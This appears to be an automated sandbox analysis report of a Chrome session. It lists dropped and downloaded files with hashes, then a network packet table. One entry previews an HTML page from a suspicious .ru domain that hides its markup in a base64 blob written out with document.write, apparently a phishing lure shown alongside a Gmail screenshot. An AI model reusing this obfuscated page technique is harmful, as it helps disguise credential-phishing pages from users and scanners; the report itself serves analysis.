                      Preview:L..................F.@.. ...$+.,........f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........I.Sm.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2693
                      Entropy (8bit):4.001801602118296
                      Encrypted:false
                      SSDEEP:48:8xCd9TlRsHHidAKZdA14tseh7sFiZUkmgqeh7s6y+BX:8x8Lunoy
                      MD5:BF34BE189ACEA44CD30179742E984389
                      SHA1:C736E7D9B3E386F9D01167D374D1C073D07A2C37
                      SHA-256:D799DBEDCBC8C2E7708DC330AA78C7C7028B624DB96DC60520E0D7A27D93BFB9
                      SHA-512:4A29F58A69D24D4B7BDA8D6DD9D283EEB5CEAB4D735858269431443B666573650B91E97354D3DB51EE89DB186E931ADE41DC341F7EB1B751731850540B42B743
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........I.Sm.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:00:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):3.9890964407224443
                      Encrypted:false
                      SSDEEP:48:8Ad9TlRiMHHidAKZdA1vehDiZUkwqehQy+R:8uLitiy
                      MD5:A4B2E05F0490D1C17421E99325F9B935
                      SHA1:E5CAC33FEAD3508B17EDA111328358367AA08B45
                      SHA-256:7F763714393AACEA6CC7ADA30C529E039C877F88616319C262B0AA47289C6504
                      SHA-512:9279C92D355E534E5CA675AC743E464392BCAE8FA6ED5CFD8CC2FAF857F0256ACCC43A82A272D3C1BA7603C97016DA6E48DB76F763FC96E445EF37D3FEC6753E
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,........f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........I.Sm.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:00:40 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):3.97630774394951
                      Encrypted:false
                      SSDEEP:48:8Hd9TlRiMHHidAKZdA1hehBiZUk1W1qehWy+C:8DLit92y
                      MD5:13AB2D84B87ABB163F4AE8C6E500586C
                      SHA1:96229A92CE694F3E135BB6E16D4E188E2150660C
                      SHA-256:276F48D7122CCAF3A6A099B44938E605E7E355AFFEF698F4FF3906EEF6B399A8
                      SHA-512:8F2F8CD8324E1C6E32CB895C4519AD2B5BBFC76DCB3E6EE1CC8CBCA98E35203C20D4B38C0C53DAB139367E525606582E6C88EA0B6A8ED82DB40D3E911BF955C2
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,....b...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........I.Sm.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:00:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2683
                      Entropy (8bit):3.98876416903634
                      Encrypted:false
                      SSDEEP:48:8bd9TlRiMHHidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8PLixT/TbxWOvTboy7T
                      MD5:DBC26F0F9E7BD4E1768831CF2464ACAE
                      SHA1:89EC1C16BEF8A9F4301C0CB176282560EB59429E
                      SHA-256:5D55D9F6B1E17341A844693D6B270BD3D9F2C6AE64FC593266258B3C40C50767
                      SHA-512:09E634E906A7D858E6875C2782AB8D5DAEDCADD2BAC2719A512B50027179B7C9652D044F0AAFD0A24C42BBB4AD292773BB20A597EDFB12CF98376DEC1D74EA71
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,.......f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........I.Sm.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65447)
                      Category:dropped
                      Size (bytes):89501
                      Entropy (8bit):5.289893677458563
                      Encrypted:false
                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                      Malicious:false
                      Reputation:low
                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65447)
                      Category:downloaded
                      Size (bytes):89501
                      Entropy (8bit):5.289893677458563
                      Encrypted:false
                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                      Malicious:false
                      Reputation:low
                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65452), with CRLF line terminators
                      Category:downloaded
                      Size (bytes):448067
                      Entropy (8bit):3.3055040325390643
                      Encrypted:false
                      SSDEEP:768:+ktYmG/kw9BaquIvAjdw7UTktYmG/kw9BaquIvAjdw7slrClrY:+IYR/kw9BF4ZwAIYR/kw9BF4Zw4ke
                      MD5:14B1FD4D4C6438BB8EF668FBF26E8118
                      SHA1:C70311AEB2446CFED65589377C87AFE05810F9B9
                      SHA-256:CCEDC18A17A378814616883756A21E363990095FAEDA023065EDE4F33B4B7992
                      SHA-512:F7D3ECED726DD93DD494EEA6458386F5739A23B43362ACDAE48D97B40B13282A79AB2436550FFDB5A1F8801A91E290329E2145931BE3D5E7891E16651711AA11
                      Malicious:false
                      Reputation:low
                      URL:https://xucr.vafdcekgwp.ru/aIDt6/
                      Preview:<script>....if(atob("aHR0cHM6Ly94dWNyLnZhZmRjZWtnd3AucnUvYUlEdDYv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tO
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.5
                      Encrypted:false
                      SSDEEP:3:H+rYn:D
                      MD5:F1C9C44E663E7E62582E3F5B236C1C72
                      SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                      SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                      SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                      Malicious:false
                      Reputation:low
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkORz5Qs3rmyhIFDTcwqTA=?alt=proto
                      Preview:CgkKBw03MKkwGgA=
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1741x979, Scaling: [none]x[none], YUV color, decoders should clamp
                      Category:downloaded
                      Size (bytes):106290
                      Entropy (8bit):7.99716969201618
                      Encrypted:true
                      SSDEEP:3072:ibuyn9NZDLjSk2CB8bAsKDFN8+OUwNuuYWpq:y9NtjzKkpN8VLu+M
                      MD5:428183BFB7C31D8C3BCC985DAC004681
                      SHA1:691AE27C0FC2FE29732BD7C6907F4A9BE9253356
                      SHA-256:B4F40DAF431A5CF056DFFF45E867C8C24D8107505CD46FF17B0F9102E4FE3D2B
                      SHA-512:7E648B56988E9B66FCBE3DA447CEACFAC2A39D43D78604B50085CA3F64C898DDFD81F5C01F4A6854511BCC8845BABA7F8C4EC20974094F7F87AF27E4D1A78003
                      Malicious:false
                      Reputation:low
                      URL:https://cdn.prod.website-files.com/5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp
                      Preview:RIFF*...WEBPVP8 .....>...*....>.F.K...,..9A...in.f.Y....... j.........._.)|u.......=.?.....'M.W........c........t........7.'.o.?.{_..@?.z\z.~.{.. .C...W._........}@?..jt......?.?......../..<....._._....G...?........_........_._.................._........G.?.`.Q./..../.....o./.A......?.|.u/.?........s...?.............~.A.{.W....C.q.......?..`?....................y...........|..:.................k.....o..........u..................m.....{.....q..-..f.$M.. E........L'&..^...........<.y+.-.+..5.......b...FTM.c...............JMA...$...`+.x.]... ..7kc|..5....%.x.W{..&4......:.t....;.w@.....t..(.T)a6F........."......%\u...'D..........}..3....F.Lbh.g..g....-....3..%.W9....n.F~5R/5J..ql..~.F.B.LX.+...S.......+.0+c|...F........;.O..i.`..D.ez+uRj.I..9..e..q...;.u.c1.'itl...F....dx..pN......Y...|...&~>Q...o=.1`.)!.d.....A....~......8....Q.E.dj..V.`U...XUQ....o.}..pe%.-..H.....J.7........58.-.....".<..O._..N..;.i..b..1".I.}-...>......f.]...Ue....w.L._.z...
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1741x979, Scaling: [none]x[none], YUV color, decoders should clamp
                      Category:dropped
                      Size (bytes):106290
                      Entropy (8bit):7.99716969201618
                      Encrypted:true
                      SSDEEP:3072:ibuyn9NZDLjSk2CB8bAsKDFN8+OUwNuuYWpq:y9NtjzKkpN8VLu+M
                      MD5:428183BFB7C31D8C3BCC985DAC004681
                      SHA1:691AE27C0FC2FE29732BD7C6907F4A9BE9253356
                      SHA-256:B4F40DAF431A5CF056DFFF45E867C8C24D8107505CD46FF17B0F9102E4FE3D2B
                      SHA-512:7E648B56988E9B66FCBE3DA447CEACFAC2A39D43D78604B50085CA3F64C898DDFD81F5C01F4A6854511BCC8845BABA7F8C4EC20974094F7F87AF27E4D1A78003
                      Malicious:false
                      Reputation:low
                      Preview:RIFF*...WEBPVP8 .....>...*....>.F.K...,..9A...in.f.Y....... j.........._.)|u.......=.?.....'M.W........c........t........7.'.o.?.{_..@?.z\z.~.{.. .C...W._........}@?..jt......?.?......../..<....._._....G...?........_........_._.................._........G.?.`.Q./..../.....o./.A......?.|.u/.?........s...?.............~.A.{.W....C.q.......?..`?....................y...........|..:.................k.....o..........u..................m.....{.....q..-..f.$M.. E........L'&..^...........<.y+.-.+..5.......b...FTM.c...............JMA...$...`+.x.]... ..7kc|..5....%.x.W{..&4......:.t....;.w@.....t..(.T)a6F........."......%\u...'D..........}..3....F.Lbh.g..g....-....3..%.W9....n.F~5R/5J..ql..~.F.B.LX.+...S.......+.0+c|...F........;.O..i.`..D.ez+uRj.I..9..e..q...;.u.c1.'itl...F....dx..pN......Y...|...&~>Q...o=.1`.)!.d.....A....~......8....Q.E.dj..V.`U...XUQ....o.}..pe%.-..H.....J.7........58.-.....".<..O._..N..;.i..b..1".I.}-...>......f.]...Ue....w.L._.z...
                      No static file info
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 14, 2025 18:00:30.975846052 CET49675443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:30.975857019 CET49674443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:31.147666931 CET49673443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:40.575592995 CET49675443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:40.583234072 CET49674443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:40.755095005 CET49673443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:42.440114975 CET4434970323.1.237.91192.168.2.5
                      Jan 14, 2025 18:00:42.440202951 CET49703443192.168.2.523.1.237.91
                      Jan 14, 2025 18:00:42.921960115 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:42.921998978 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:42.922102928 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:42.922308922 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:42.922322989 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:43.565638065 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:43.566363096 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:43.566381931 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:43.567462921 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:43.567534924 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:43.568851948 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:43.568927050 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:43.614320993 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:43.614340067 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:43.661190033 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:43.931279898 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:43.931344986 CET44349713104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:43.931736946 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:43.931787968 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:43.931833982 CET44349714104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:43.931888103 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:43.932199001 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:43.932213068 CET44349713104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:43.932502985 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:43.932516098 CET44349714104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.408432961 CET44349713104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.408689976 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.408704996 CET44349713104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.409709930 CET44349713104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.409763098 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.411365032 CET44349714104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.416567087 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.416598082 CET44349714104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.417988062 CET44349714104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.418054104 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.419529915 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.419559956 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.419599056 CET44349713104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.419632912 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.419665098 CET49713443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.420219898 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.420295954 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.420363903 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.420778036 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.420790911 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.420830965 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.420867920 CET44349714104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.420932055 CET49714443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.421283007 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.421334982 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.421416998 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.421575069 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.421608925 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.421920061 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.421938896 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.899777889 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.900065899 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.900088072 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.901479959 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.901565075 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.902689934 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.902807951 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.902903080 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.902909994 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.905673981 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.905900002 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.905914068 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.909279108 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.909432888 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.909734964 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.909796953 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:44.945703983 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.960886955 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:44.960905075 CET44349717104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.007208109 CET49717443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:45.387944937 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388025999 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388283968 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388313055 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:45.388320923 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388343096 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388377905 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:45.388379097 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388413906 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388442993 CET49716443192.168.2.5104.21.64.1
                      Jan 14, 2025 18:00:45.388443947 CET44349716104.21.64.1192.168.2.5
                      Jan 14, 2025 18:00:45.388453007 CET44349716104.21.64.1192.168.2.5
